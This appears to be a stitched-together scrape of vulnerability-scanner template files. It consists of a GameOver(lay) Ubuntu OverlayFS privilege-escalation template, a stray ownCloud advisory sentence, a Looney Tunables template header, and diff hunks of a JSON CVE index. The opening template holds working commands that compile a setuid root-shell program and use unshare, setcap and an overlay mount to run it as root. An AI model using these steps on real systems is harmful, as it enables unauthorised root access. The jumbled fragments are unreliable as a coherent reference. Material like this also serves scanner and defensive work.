name:GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
author:princechaddha
severity:high
description:|
A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
impact:|
An attacker with local access can gain elevated privileges on the affected system.
remediation:|
Apply the latest security patches and updates provided by Ubuntu to fix the vulnerability.
echo '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
gcc test.c -o test
unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"
An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.
name:Looney Tunables Linux - Local Privilege Escalation
author:nybble04
severity:high
description:|
A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.
{"ID":"CVE-2014-3206","Info":{"Name":"Seagate BlackArmor NAS - Command Injection","Severity":"critical","Description":"Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-3206.yaml"}
{"ID":"CVE-2014-3704","Info":{"Name":"Drupal SQL Injection","Severity":"high","Description":"The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-3704.yaml"}
{"ID":"CVE-2014-3744","Info":{"Name":"Node.js st module Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-3744.yaml"}
{"ID":"CVE-2014-4210","Info":{"Name":"Oracle Weblogic - SSRF in SearchPublicRegistries.jsp","Severity":"medium","Description":"An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-4210.yaml"}
{"ID":"CVE-2014-4210","Info":{"Name":"Oracle Weblogic - Server-Side Request Forgery","Severity":"medium","Description":"An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-4210.yaml"}
{"ID":"CVE-2014-4513","Info":{"Name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2014/CVE-2014-4513.yaml"}
{"ID":"CVE-2014-4535","Info":{"Name":"Import Legacy Media \u003c= 0.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4535.yaml"}
{"ID":"CVE-2014-4536","Info":{"Name":"Infusionsoft Gravity Forms Add-on \u003c 1.5.7 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4536.yaml"}
@ -246,6 +246,7 @@
{"ID":"CVE-2014-8799","Info":{"Name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-8799.yaml"}
{"ID":"CVE-2014-9094","Info":{"Name":"WordPress DZS-VideoGallery Plugin Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2014/CVE-2014-9094.yaml"}
{"ID":"CVE-2014-9119","Info":{"Name":"WordPress DB Backup \u003c=4.5 - Local File Inclusion","Severity":"medium","Description":"WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-9119.yaml"}
{"ID":"CVE-2014-9180","Info":{"Name":"Eleanor CMS - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in go.php in Eleanor CMS allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the QUERY_STRING.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-9180.yaml"}
{"ID":"CVE-2014-9444","Info":{"Name":"Frontend Uploader \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2014/CVE-2014-9444.yaml"}
{"ID":"CVE-2014-9606","Info":{"Name":"Netsweeper 4.0.8 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-9606.yaml"}
{"ID":"CVE-2014-9607","Info":{"Name":"Netsweeper 4.0.4 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-9607.yaml"}
@ -263,12 +264,14 @@
{"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"}
{"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"}
{"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"}
{"ID":"CVE-2015-20067","Info":{"Name":"WP Attachment Export \u003c 0.2.4 - Unrestricted File Download","Severity":"high","Description":"The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\npowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-20067.yaml"}
{"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"}
{"ID":"CVE-2015-2068","Info":{"Name":"Magento Server Mass Importer - Cross-Site Scripting","Severity":"medium","Description":"Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2068.yaml"}
{"ID":"CVE-2015-2080","Info":{"Name":"Eclipse Jetty \u003c9.2.9.v20150224 - Sensitive Information Leakage","Severity":"high","Description":"Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2080.yaml"}
{"ID":"CVE-2015-2166","Info":{"Name":"Ericsson Drutt MSDP - Local File Inclusion","Severity":"medium","Description":"Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2166.yaml"}
{"ID":"CVE-2015-2196","Info":{"Name":"WordPress Spider Calendar \u003c=1.4.9 - SQL Injection","Severity":"high","Description":"WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-2196.yaml"}
{"ID":"CVE-2015-2755","Info":{"Name":"WordPress AB Google Map Travel \u003c=3.4 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2015/CVE-2015-2755.yaml"}
{"ID":"CVE-2015-2794","Info":{"Name":"DotNetNuke 07.04.00 - Administration Authentication Bypass","Severity":"critical","Description":"The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-2794.yaml"}
{"ID":"CVE-2015-2807","Info":{"Name":"Navis DocumentCloud \u003c0.1.1 - Cross-Site Scripting","Severity":"medium","Description":"Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2807.yaml"}
{"ID":"CVE-2015-2863","Info":{"Name":"Kaseya Virtual System Administrator - Open Redirect","Severity":"medium","Description":"Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-2863.yaml"}
{"ID":"CVE-2015-2996","Info":{"Name":"SysAid Help Desk \u003c15.2 - Local File Inclusion","Severity":"high","Description":"SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2015/CVE-2015-2996.yaml"}
@ -400,7 +403,7 @@
{"ID":"CVE-2017-15287","Info":{"Name":"Dreambox WebControl 2.0.0 - Cross-Site Scripting","Severity":"medium","Description":"Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the \"Name des Bouquets\" field, or the file parameter to the /file URI.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-15287.yaml"}
{"ID":"CVE-2017-15363","Info":{"Name":"Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion","Severity":"high","Description":"Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 is susceptible to local file inclusion in public/examples/resources/getsource.php. This could allow remote attackers to read arbitrary files via the file parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-15363.yaml"}
{"ID":"CVE-2017-15647","Info":{"Name":"FiberHome Routers - Local File Inclusion","Severity":"high","Description":"FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-15647.yaml"}
{"ID":"CVE-2017-15715","Info":{"Name":"Apache httpd \u003c=2.4.29 - Arbitrary File Upload","Severity":"high","Description":"Apache httpd 2.4.0 to 2.4.29 is susceptible to arbitrary file upload vulnerabilities via the expression specified in \u003cFilesMatch\u003e, which could match '$' to a newline character in a malicious filename rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2017/CVE-2017-15715.yaml"}
{"ID":"CVE-2017-15715","Info":{"Name":"Apache httpd \u003c=2.4.29 - Arbitrary File Upload","Severity":"high","Description":"Apache httpd 2.4.0 to 2.4.29 is susceptible to arbitrary file upload vulnerabilities via the expression specified in \u003cFilesMatch\u003e, which could match '$' to a newline character in a malicious filename rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2017/CVE-2017-15715.yaml"}
{"ID":"CVE-2017-15944","Info":{"Name":"Palo Alto Network PAN-OS - Remote Code Execution","Severity":"critical","Description":"Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-15944.yaml"}
{"ID":"CVE-2017-16806","Info":{"Name":"Ulterius Server \u003c 1.9.5.0 - Directory Traversal","Severity":"high","Description":"Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-16806.yaml"}
{"ID":"CVE-2017-16877","Info":{"Name":"Nextjs \u003c2.4.1 - Local File Inclusion","Severity":"high","Description":"ZEIT Next.js before 2.4.1 is susceptible to local file inclusion via the /_next and /static request namespace, allowing attackers to obtain sensitive information.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-16877.yaml"}
@ -412,7 +415,35 @@
{"ID":"CVE-2017-17731","Info":{"Name":"DedeCMS 5.7 - SQL Injection","Severity":"critical","Description":"DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-17731.yaml"}
{"ID":"CVE-2017-17736","Info":{"Name":"Kentico - Installer Privilege Escalation","Severity":"critical","Description":"Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 are susceptible to a privilege escalation attack. An attacker can obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-17736.yaml"}
{"ID":"CVE-2017-18024","Info":{"Name":"AvantFAX 3.3.3 - Cross-Site Scripting","Severity":"medium","Description":"AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18024.yaml"}
{"ID":"CVE-2017-18487","Info":{"Name":"AdPush \u003c 1.44 - Cross-Site Scripting","Severity":"medium","Description":"The adsense-plugin (aka Google AdSense) plugin before 1.44 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18487.yaml"}
{"ID":"CVE-2017-18490","Info":{"Name":"Contact Form Multi by BestWebSoft \u003c 1.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The contact-form-multi plugin before 1.2.1 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18490.yaml"}
{"ID":"CVE-2017-18491","Info":{"Name":"Contact Form by BestWebSoft \u003c 4.0.6 - Cross-Site Scripting","Severity":"medium","Description":"The contact-form-plugin plugin before 4.0.6 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18491.yaml"}
{"ID":"CVE-2017-18492","Info":{"Name":"Contact Form to DB by BestWebSoft \u003c 1.5.7 - Cross-Site Scripting","Severity":"medium","Description":"The contact-form-to-db plugin before 1.5.7 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18492.yaml"}
{"ID":"CVE-2017-18493","Info":{"Name":"Custom Admin Page by BestWebSoft \u003c 0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"The custom-admin-page plugin before 0.1.2 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18493.yaml"}
{"ID":"CVE-2017-18494","Info":{"Name":"Custom Search by BestWebSoft \u003c 1.36 - Cross-Site Scripting","Severity":"medium","Description":"The custom-search-plugin plugin before 1.36 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18494.yaml"}
{"ID":"CVE-2017-18496","Info":{"Name":"Htaccess by BestWebSoft \u003c 1.7.6 - Cross-Site Scripting","Severity":"medium","Description":"The htaccess plugin before 1.7.6 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18496.yaml"}
{"ID":"CVE-2017-18500","Info":{"Name":"Social Buttons Pack by BestWebSof \u003c 1.1.1 - Cross-Site Scripting","Severity":"medium","Description":"The social-buttons-pack plugin before 1.1.1 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18500.yaml"}
{"ID":"CVE-2017-18501","Info":{"Name":"Social Login by BestWebSoft \u003c 0.2 - Cross-Site Scripting","Severity":"medium","Description":"The social-login-bws plugin before 0.2 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18501.yaml"}
{"ID":"CVE-2017-18502","Info":{"Name":"Subscriber by BestWebSoft \u003c 1.3.5 - Cross-Site Scripting","Severity":"medium","Description":"The subscriber plugin before 1.3.5 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18502.yaml"}
{"ID":"CVE-2017-18505","Info":{"Name":"BestWebSoft's Twitter \u003c 2.55 - Cross-Site Scripting","Severity":"medium","Description":"The twitter-plugin plugin before 2.55 for WordPress has XSS.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18505.yaml"}
{"ID":"CVE-2017-18516","Info":{"Name":"LinkedIn by BestWebSoft \u003c 1.0.5 - Cross-Site Scripting","Severity":"medium","Description":"The bws-linkedin plugin before 1.0.5 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18516.yaml"}
{"ID":"CVE-2017-18517","Info":{"Name":"Pinterest by BestWebSoft \u003c 1.0.5 - Cross-Site Scripting","Severity":"medium","Description":"The bws-pinterest plugin before 1.0.5 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18517.yaml"}
{"ID":"CVE-2017-18518","Info":{"Name":"SMTP by BestWebSoft \u003c 1.1.0 - Cross-Site Scripting","Severity":"medium","Description":"The bws-smtp plugin before 1.1.0 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18518.yaml"}
{"ID":"CVE-2017-18527","Info":{"Name":"Pagination by BestWebSoft \u003c 1.0.7 - Cross-Site Scripting","Severity":"medium","Description":"The pagination plugin before 1.0.7 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18527.yaml"}
{"ID":"CVE-2017-18528","Info":{"Name":"PDF \u0026 Print by BestWebSoft \u003c 1.9.4 - Cross-Site Scripting","Severity":"medium","Description":"The pdf-print plugin before 1.9.4 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18528.yaml"}
{"ID":"CVE-2017-18529","Info":{"Name":"PromoBar by BestWebSoft \u003c 1.1.1 - Cross-Site Scripting","Severity":"medium","Description":"The promobar plugin before 1.1.1 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18529.yaml"}
{"ID":"CVE-2017-18530","Info":{"Name":"Rating by BestWebSoft \u003c 0.2 - Cross-Site Scripting","Severity":"medium","Description":"The rating-bws plugin before 0.2 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18530.yaml"}
{"ID":"CVE-2017-18532","Info":{"Name":"Realty by BestWebSoft \u003c 1.1.0 - Cross-Site Scripting","Severity":"medium","Description":"The realty plugin before 1.1.0 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18532.yaml"}
{"ID":"CVE-2017-18536","Info":{"Name":"WordPress Stop User Enumeration \u003c=1.3.7 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18536.yaml"}
{"ID":"CVE-2017-18537","Info":{"Name":"Visitors Online by BestWebSoft \u003c 1.0.0 - Cross-Site Scripting","Severity":"medium","Description":"The visitors-online plugin before 1.0.0 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18537.yaml"}
{"ID":"CVE-2017-18542","Info":{"Name":"Zendesk Help Center by BestWebSoft \u003c 1.0.5 - Cross-Site Scripting","Severity":"medium","Description":"The zendesk-help-center plugin before 1.0.5 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18542.yaml"}
{"ID":"CVE-2017-18556","Info":{"Name":"Google Analytics by BestWebSoft \u003c 1.7.1 - Cross-Site Scripting","Severity":"medium","Description":"The bws-google-analytics plugin before 1.7.1 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18556.yaml"}
{"ID":"CVE-2017-18557","Info":{"Name":"Google Maps by BestWebSoft \u003c 1.3.6 - Cross-Site Scripting","Severity":"medium","Description":"The bws-google-maps plugin before 1.3.6 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18557.yaml"}
{"ID":"CVE-2017-18558","Info":{"Name":"Testimonials by BestWebSoft \u003c 0.1.9 - Cross-Site Scripting","Severity":"medium","Description":"The bws-testimonials plugin before 0.1.9 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18558.yaml"}
{"ID":"CVE-2017-18562","Info":{"Name":"Error Log Viewer by BestWebSoft \u003c 1.0.6 - Cross-Site Scripting","Severity":"medium","Description":"The error-log-viewer plugin before 1.0.6 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18562.yaml"}
{"ID":"CVE-2017-18564","Info":{"Name":"Sender by BestWebSoft \u003c 1.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The sender plugin before 1.2.1 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18564.yaml"}
{"ID":"CVE-2017-18565","Info":{"Name":"Updater by BestWebSoft \u003c 1.35 - Cross-Site Scripting","Severity":"medium","Description":"The updater plugin before 1.35 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18565.yaml"}
{"ID":"CVE-2017-18566","Info":{"Name":"User Role by BestWebSoft \u003c 1.5.6 - Cross-Site Scripting","Severity":"medium","Description":"The user-role plugin before 1.5.6 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18566.yaml"}
{"ID":"CVE-2017-18598","Info":{"Name":"WordPress Qards - Cross-Site Scripting","Severity":"medium","Description":"WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18598.yaml"}
{"ID":"CVE-2017-18638","Info":{"Name":"Graphite \u003c=1.1.5 - Server-Side Request Forgery","Severity":"high","Description":"Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to server-side request forgery (SSR)F. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-18638.yaml"}
{"ID":"CVE-2017-3506","Info":{"Name":"Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution","Severity":"high","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.","Classification":{"CVSSScore":"7.4"}},"file_path":"http/cves/2017/CVE-2017-3506.yaml"}
@ -428,6 +459,7 @@
{"ID":"CVE-2017-7269","Info":{"Name":"Windows Server 2003 \u0026 IIS 6.0 - Remote Code Execution","Severity":"critical","Description":"Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 contains a buffer overflow vulnerability in the ScStoragePathFromUrl function in the WebDAV service that could allow remote attackers to execute arbitrary code via a long header beginning with \"If \u003chttp://\" in a PROPFIND request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-7269.yaml"}
{"ID":"CVE-2017-7391","Info":{"Name":"Magmi 0.7.22 - Cross-Site Scripting","Severity":"medium","Description":"Magmi 0.7.22 contains a cross-site scripting vulnerability due to insufficient filtration of user-supplied data (prefix) passed to the magmi-git-master/magmi/web/ajax_gettime.php URL.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-7391.yaml"}
